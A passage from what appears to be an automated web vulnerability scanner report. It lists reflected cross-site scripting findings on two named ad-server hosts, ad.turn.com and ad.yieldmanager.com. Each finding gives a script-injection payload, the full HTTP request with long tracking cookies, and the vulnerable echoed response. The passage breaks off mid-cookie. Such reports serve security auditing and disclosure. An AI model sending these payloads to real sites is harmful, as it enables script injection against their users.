pf=vMu105fDV86s5u_pfyzkwWq9eKoz4vDlk7rwaibxJdAbKFeXPku5ncGXhNYMJlHrQpSWfMg4zJTXkUbK3_tEItsgHB2gbaTLwk5wVJg2CJ5r03FkicUqy5fZngozU5xV80rzw8etfwG0ZJu3zdHyKyYNkVIYm0n9tbxRH_3UGWCwrQWbS3lZSCmRIyvnc-kLfISaeqE-ZUmsIsRUyu_I_fEK6LCvtj285L5y13Ikufo4bsnngTREyO1X2ATZ9AxN0vpx9w5GxVO9JmXYcmvlCHsLc4AF1btfOvnkCaP3RArXXwR6V4Ksfpi1cswTiSLUBEm5i8bzW7mEMZhpQgv3LqEKXyqFnVZw8YfekqmE25S_8-12ak9fScdBgH3lVdsZs9XfxCr3cVJI8tLj7JiLJGwTUCSASu1ibIHS4OGBGcxbKwUqO9_3MKVuYpEZdjF9tUAfHMBY5s2dpgrQ5VC82JcD3euh61mT_VMYuakVhlR-OHtE-Re4RfkXRbJHjS4w8X1P_LkyFT3R2EcSDZwEpuUIHTWNQ166lrHqhAqYXRsaNpyt6KVR_Um3RFK2MjvmYeC8ZphcKIoslYXD1lGq6CP5ra86jR4zvm8n3VYqg2ogaaYciwdQx7sk7knKiUYvhBKntDDGVOKbGcAJL67dnQ3rM0p0cVo3Ns0jK1YWO_YEPvtiHiI-m5NFNmGYB4mTfSjsuxl8cTU7MvhDb4Q_h6eR75tfLrUUQuldN97Wxp4nVs-8ME2jpHza43k_08481E_iBBu4i3HQEFsb4pCT2YEnRQG0RZCaNcuRWzPd6swjm2jBrbL93I_yBuPE3vfjCWmUyZVUMglgitahHAnOi5HprGMLLpOWaQ3awfFeLSBFb-E-DAEk68R-g_CBN4z-IWxmK_ufHIIKd9jBhCu205KJTktKpSinfK343eirEtNXXGmqbemclXcqZzRxmbGck50doO6tfSL-z4w5P-iw-kG2zrYVQnX4Sex78zOtAR1YF7LEgwPewS3-B3BlJAuP44G4dwDWYdHBRxVJC1gJiiIKliRqBJ8A3Y1mclt8B8CTk1tvGOZ7bQtHCPCnY2QcTvouxdxcraF60D7_gKkGz23gLH4DRBu5RbLJgV6fOENYzrjRKSlgdkIlfg62zHuMO1RIiJCOWku-TRwGy-sobhN0G40TB13tFaokeP3q4qRFjKt7q6zRLjFPtvoxlW3FG6ZkiIC1GqE2NESz84uwdoK3IkgBvco7FdqYllL3IRFY79Mnc0fkrSE4VRhUo57RQ_l4Et_j3VgRE4TNfV9uTzUbm62bBdQkozhVDriioPe3W1Xx5FC0wTFI1apXagb-3z-7Iv8eC59WEsDQhpXp8VSSlkCfph7x6AFKzdRD_efbtSxqsgwqVuezCr7BMdhWe_R8R-5gMiqMFz6F1AU7-oRK2Rc62ojp2ntZpv2JWnM1_shCytqZcxQ4cr6Qdtkpg-xmvMfX9sb3ndGxt2ALx8zrkK1cdUFzUwN3DhGVZzdGT1G1rUJfRzp_RLvDZfjxj8z8u46qTjrGqUzWVTBwz4m1-zIqP_FPemJAIq47trqtOQK252duo7MUdrg3JpTD3RarrKUNiRJnOsHAEE3xHheht3ivBnz3hwow8XaUE6U; uid=2931142961646634775; rrs=3%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15104%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 07-Nov-2011 14:59:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 11 May 2011 14:59:53 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=7608090676191050633&fpid=adcb3"><script>alert(1)</script>b1542407aad&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.93. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939c8"><script>alert(1)</script>ef8c3acda6c was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=939c8"><script>alert(1)</script>ef8c3acda6c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=49lfYbaSZC9sULu0Dsc9j4A0w_TJT6a7zSU93Wiv2By76nVUEQrqCfHGx7lLD55eJmGhHmlhz1tR1Ra54XLx9RvZTBNkiE7yn98nPyVRl25NAD9CzxyIa9WvGJtW6WWCcjZ2TdY02khAi5MXfrKXhTf3SlTsAkOoc67-nv9-JHzSvxHuaHQxpaIHd_HHvZgiEVoPtTPaqqoBSERNKypQSfr0Gvi67fABIdrDFkqH2pQDIoPfzh4dVMv54jxCLhrOuI8NBtfI3ukcD9crr6R3u7CvkqMXlcbx7Bi1EQRMvI0-QhF5lC0iuRWvKfJUQQnxoBFz3gsHFXxga30AxLTjd6eaygH6z21ZoH2a5fzloxhETDdhtdfsA0_G8wbchlE2Jng8vXLODwTGR7IM2rWUncwOw-WQzu27JDbm3zb28UIJSJS-gRbd6_lq_zsnWqQtDXki2e30ar-nIrZEby3IbX6ktS-7WSKCQ1cVQgpNNs6dzg1gLvSIwhzJ9CHnb7dyS2Rp-0JlDPDEgt7Boz_e8WX3WPl8VwFiOy0wP-CPeF60YkqIZmomQUOJddHNg8LosM3maYue6dGjGF5IpE3TfJaw7nJrYwXW28_gU2aUnfZXH1lxhSJ-Hkbx3LH7fNgeY6bUajCjQG3fHDdMG1fIjogqfEFqIPqWXHKrerlWzJ7we_lb5X3qA4azxNwDCgK1zj9AF5M8L0zjRkTi2bVOH7laPTu6jXJXf9E0wa_7P4eukRxpOSUPvzPMefMiS3F6CsA8r7p-w6Lx2aUQMF8sCClmSitS-MBruUq0LslgxFrkbtcNS092XfJ_iH1-qEzxBAK6vn5XEPH6CoDPO3SATbCvkqMXlcbx7Bi1EQRMvI09kp1qU922MWhgseCZ0yA9oBFz3gsHFXxga30AxLTjd3BNZ8Et-uLgMxsAErE71LIZKf-ZGF5mqZT4qAr6KwJ6_AZGFehbXKZVluek1-8cUSfpHBCWTc_WhsiuKHISwceCRhMEP-vqrTNfrAq34bF-UV7qwiA-DzdS3NAJnUwH98VKwCrgDD4ecVOAJt87zXnTicn6ppii7NkwfMnY3YnceJYheWkTLK5FfrssiaKppuFTVjpsaG2BvnPs8uC37Bf8FuaBd0zHMfaXMlXvmiRSSUUWuwcNPPHI9kbqCz_xT5cdd99vC4bC6OgoVXOU4XuiolLtxfX4Bt77mqmNWwAMzYy1HB58LncgBnIV8SuYwWjSqAhDRerjsLTJstXn3k93fAGg3NL2q2xrCePtC960g6vIHw2Jyhqnl0AuzEQ9uy2OhqmTSqb5s_vom2S9BdFry2mOq25RwJMysyYojbq5OEH0e8-9WHwCznRNoiPpAVtpRwkZU4LlGw1pa_aQSINqN0AbiEW6mez9vdByqElcPwGqCniUOGScBtRFWce59NkPEWuLK2RvocYs-w2VCSU29xo9t_eELo-qOr3V4b_6rJ6qoWJfLTC4s23Ovgz6z5gGPawgMxEaUTfILlas0AGOPEOAFO1Os5ybA_YPGmqcY5VMRQ0UuWRFg4faK4le06zc6zX7XuyCbrmiyrXAF7h4ukd_tYO2W-vdTSaO8z9e31SEv8mTtg6054eJlg8NRYsjsOwv-PUrBYYdnUrqIaKXbp8yFKNIGg1jm4dCMTx11A2o0sOQ5ccvSzQCVo4-YLedP_zRmBDU16GMmAX4vi6cES2Ns5aNknwfVZ8YJqSm4VNWOmxobYG-c-zy4LfsF1fViSQW9FxwtaoTED3u2cBJRRa7Bw088cj2RuoLP_FPnAzMrCiv6oWNkFhSHNDPNV5g-5umsVHXlQ3P2lQ-Ini3QKeItojaDoDbISABCFerBhJYEPL4UzdyOj82p3ETwnd8AaDc0varbGsJ4-0L3rRCWQBFgLGhPxYltUIyEQgLsBIQDOH8CUV4l-WCvOMJ8ZoRBsb45KVHuJaNoYl3viGLFY5FXqH7Kxgixse5VNukW2lHCRlTguUbDWlr9pBIg8Hkwp6ej4-1GJtnnt-GDOjketUOewYnKj5VAKGNuTapv-s71Id9C6Et0jKrqPrA341fYNvaM9xh9GX-_ZJ3L2SOPEOAFO1Os5ybA_YPGmqcF99XWuA3J5hzU_ecr1Gi2oeNg2RC4vMx5FjUiqRrmO0-mh5LMTfhrtRFIqx5jm-AZvTZNfGrAuabv0M5A8DouosjsOwv-PUrBYYdnUrqIaIHNHYRAxeinCck4FrVYQDAxQ4YYoGSDsz6HlzI-Hkj_TjHLfuthDLFZ1MLJVKZ8oQHFXRs7s5tJoMmmzd2oSgOu1W98HVFnqHBnOdpDfkHAlridfFNnlS6-nlSx7tTBerbAIeI2vlGUfbG0ZNxEUHDEA1Jh1JmSIm4qhQ12_7hjpyvEb6miC_66VvSL5Pml5WgPd9FpDjFgzufMcbyyJxOBEwyLEP-hWW5-kmOATgFPehnB2LM1zLOIXx4ZnMe0z0LhSbd_dEDGN9v5_RAIItiovjHQ4Cmjst0uS_ZAN5dmUmURXlsENb9xU6Mz9VMuO7pvYl8H7-HUJl2Ka6xoLyLZbtzyEbcWUGqqhqa9tiX1Ool3nXRVKN-1LzOuXfM3NVtJs4f61ul8zZhh25WM8DyuIZxsqa7lOxOrOQMHdw4dRwEAwKtxxI_6b-FutaN-Lv-U41umJyCpRL1lt1cGgEpB5hD13EPwO5s5-DwMGD6aoN8-37PGC9cyesf200GnzzZRiN9PqVIEPxwQb1jhhWbAkOuzsv3JtzVI0PtUqJ35DfE9ZhLI-srA5i46CagcI8CeQHj43XhmSTC0zqxgUpWBkpu7d1CWvPFLelubWUsUYzfwwIac3OVd4asDRy4Tb3ejyv3BQtedQeCLUOqeg0SFq_skUz0u9ij_v1VgfIXakRmBHzdvCY-JOe_XTrWj6RJUGHeC3nCN4x_UZC69s55XOiKPcyt6l9iKxGmUQqMunAXp1F8JSJEG7l6OPv1fjk2t8lMpvAttvjIHDirSW0fVf72b0bbH4YNLu_Hr3-dKiYlgTf7HqVNZQWUbK-DV9szgBiAs1SiDN7PvqaLqTr1TdM_3KWeoJO-CnSEWgr9Qozp9kcrjIK5abX-GWVdsDOQmjEJeDHB1vBCgSzPg8RYTgMVW3E4SxfywkVDkUHR89emr2ZPiQMIOqLpsK7AHmj_oLcuTGyfXxMAHHkZzF_kjzxNN9ZylJk4PeTQeSCNmSuwd6Ui7h291sdfTURN_H05iExVYofrvkJ5TQYUNfK3E4iJk_um-_UF55g3dXD1xQrJtwIJ75WF2AZJh9J7588Z6Lsj33fSvPRriFKu-9iW4vdfapgN28zxEb9z3o9S5VhjrAU5oaTtgSb_n-uusLm7uJxCGZGZGB8Gj332u6Qw9fjZOAN9kWDjrF9jr4TxQY3mkp4Dt7Hm1UzS7lEsBzRNL996qx_doUESD1XIFIHHtJQvkRk6L9OlRnxWZyIC-LgTGZBprvbky445Uh8PxXOesWKmtIxFp0u_LMNGGa98xE0cp24rr959_cZV8G9amf0P1ImCBwaKqNcKpIl1XQrRjFhJGRjdFTc7TZeHSZXWFP5lHnxiOAgLNRsRn-d3BIbgrKMLgoG44wFioyFmgaSIzVIIxqT36kRgQZngJXoo; fc=FSROkif6QEzQTtpBUb36S_gNoF-ZKYigcfXOCrgeHn_ucz5cXW5Mlwmu42BXqLr6rRqQpaKBKyof5NYMw3qm9wvMqEF5Nki8mb1vSqmztIXwgXaghxUZ0Yi8V_8u0E15pwNGRrcYbOFXslFF8JgPJ4hlfd5Vr1apsTJViSHXFg8nEpLOK5atrYviv-joUTkPwwO-8N2ttNV8JartNM9RLBsnc2X8IKfd5H6yzgRflMC-yL_ByfmJaqt39FhxYp5a_s1UDK-soNrH30pJLaCdOjfsdyfcA83SjMBxymPmvd0agfidLwaUjnraLpvT1tPzG0sqnNvhyDQv8I1-OfpErfpZT2r-ImqIbIee7QyEpWA; pf=vMu105fDV86s5u_pfyzkwWq9eKoz4vDlk7rwaibxJdAbKFeXPku5ncGXhNYMJlHrQpSWfMg4zJTXkUbK3_tEItsgHB2gbaTLwk5wVJg2CJ5r03FkicUqy5fZngozU5xV80rzw8etfwG0ZJu3zdHyKyYNkVIYm0n9tbxRH_3UGWCwrQWbS3lZSCmRIyvnc-kLfISaeqE-ZUmsIsRUyu_I_fEK6LCvtj285L5y13Ikufo4bsnngTREyO1X2ATZ9AxN0vpx9w5GxVO9JmXYcmvlCHsLc4AF1btfOvnkCaP3RArXXwR6V4Ksfpi1cswTiSLUBEm5i8bzW7mEMZhpQgv3LqEKXyqFnVZw8YfekqmE25S_8-12ak9fScdBgH3lVdsZs9XfxCr3cVJI8tLj7JiLJGwTUCSASu1ibIHS4OGBGcxbKwUqO9_3MKVuYpEZdjF9tUAfHMBY5s2dpgrQ5VC82JcD3euh61mT_VMYuakVhlR-OHtE-Re4RfkXRbJHjS4w8X1P_LkyFT3R2EcSDZwEpuUIHTWNQ166lrHqhAqYXRsaNpyt6KVR_Um3RFK2MjvmYeC8ZphcKIoslYXD1lGq6CP5ra86jR4zvm8n3VYqg2ogaaYciwdQx7sk7knKiUYvhBKntDDGVOKbGcAJL67dnQ3rM0p0cVo3Ns0jK1YWO_YEPvtiHiI-m5NFNmGYB4mTfSjsuxl8cTU7MvhDb4Q_h6eR75tfLrUUQuldN97Wxp4nVs-8ME2jpHza43k_08481E_iBBu4i3HQEFsb4pCT2YEnRQG0RZCaNcuRWzPd6swjm2jBrbL93I_yBuPE3vfjCWmUyZVUMglgitahHAnOi5HprGMLLpOWaQ3awfFeLSBFb-E-DAEk68R-g_CBN4z-IWxmK_ufHIIKd9jBhCu205KJTktKpSinfK343eirEtNXXGmqbemclXcqZzRxmbGck50doO6tfSL-z4w5P-iw-kG2zrYVQnX4Sex78zOtAR1YF7LEgwPewS3-B3BlJAuP44G4dwDWYdHBRxVJC1gJiiIKliRqBJ8A3Y1mclt8B8CTk1tvGOZ7bQtHCPCnY2QcTvouxdxcraF60D7_gKkGz23gLH4DRBu5RbLJgV6fOENYzrjRKSlgdkIlfg62zHuMO1RIiJCOWku-TRwGy-sobhN0G40TB13tFaokeP3q4qRFjKt7q6zRLjFPtvoxlW3FG6ZkiIC1GqE2NESz84uwdoK3IkgBvco7FdqYllL3IRFY79Mnc0fkrSE4VRhUo57RQ_l4Et_j3VgRE4TNfV9uTzUbm62bBdQkozhVDriioPe3W1Xx5FC0wTFI1apXagb-3z-7Iv8eC59WEsDQhpXp8VSSlkCfph7x6AFKzdRD_efbtSxqsgwqVuezCr7BMdhWe_R8R-5gMiqMFz6F1AU7-oRK2Rc62ojp2ntZpv2JWnM1_shCytqZcxQ4cr6Qdtkpg-xmvMfX9sb3ndGxt2ALx8zrkK1cdUFzUwN3DhGVZzdGT1G1rUJfRzp_RLvDZfjxj8z8u46qTjrGqUzWVTBwz4m1-zIqP_FPemJAIq47trqtOQK252duo7MUdrg3JpTD3RarrKUNiRJnOsHAEE3xHheht3ivBnz3hwow8XaUE6U; uid=2931142961646634775; rrs=3%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15104%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 07-Nov-2011 15:00:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:00:02 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8639748840003986038&fpid=1&nu=n&t=&sp=939c8"><script>alert(1)</script>ef8c3acda6c&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.94. http://ad.yieldmanager.com/getbid [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bc01c<script>alert(1)</script>9c8a0fe4eae was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796244&_salt={SDC_RND}&r=1&callback=C1Qs4Xi5Px9F.b3Ul4Yp5Rb9Vbc01c<script>alert(1)</script>9c8a0fe4eae&cookie=1&flash=1&bvs=&hvs=BBJRMUOOP&u=http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!N!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!$<xl/w!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9"; pv1="b!!!!@!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=!>RfM.jTN!!L7_!,x.^!$Rao!,+V>!$%hK!%lRH!!?5%$q316!wVd.!%vQM!%Oo9!$hK:~~~~~=!$Yk=##A-M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wjV!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!%17!!!#G!#wjW!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!'0u!!!#G!#wjX!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!(]!!!!#G!#wjY!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!+[-!!!#G!#wjZ!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!1YB!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%(!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!+=!$MK!!0O<!!!!3=!$MK!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!1=!$MK!!J<E!!!!1=!$MK!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!2=!$MK!!q:E!!!!/=!$MK!!q<+!!!!0=!$MK!!q</!!!!0=!$MK!!q<3!!!!0=!$MK!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!3=!$MK!!vRm!!!!+=!$MK!!vRq!!!!+=!$MK!!vRr!!!!+=!$MK!!vRw!!!!3=!$MK!!vRx!!!!+=!$MK!!vRy!!!!+=!$MK!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!+=!$MK!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!+=!$MM!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!+=!$MK!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!+=!$MK!#6hK!!!!#=!27c!#7.'!!!!+=!$MK!#7.:!!!!+=!$MK!#7.O!!!!+=!$MK!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!+=!$MK!#MTF!!!!+=!$MK!#MTH!!!!+=!$MK!#MTI!!!!+=!$MK!#MTJ!!!!+=!$MK!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!1=!$MK!#SF3!!!!1=!$MK!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!+=!$MK!#UDP!!!!1=!$MK!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!+=!$MK!#ai7!!!!+=!$MK!#ai?!!!!+=!$MK!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!+=!$MK!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!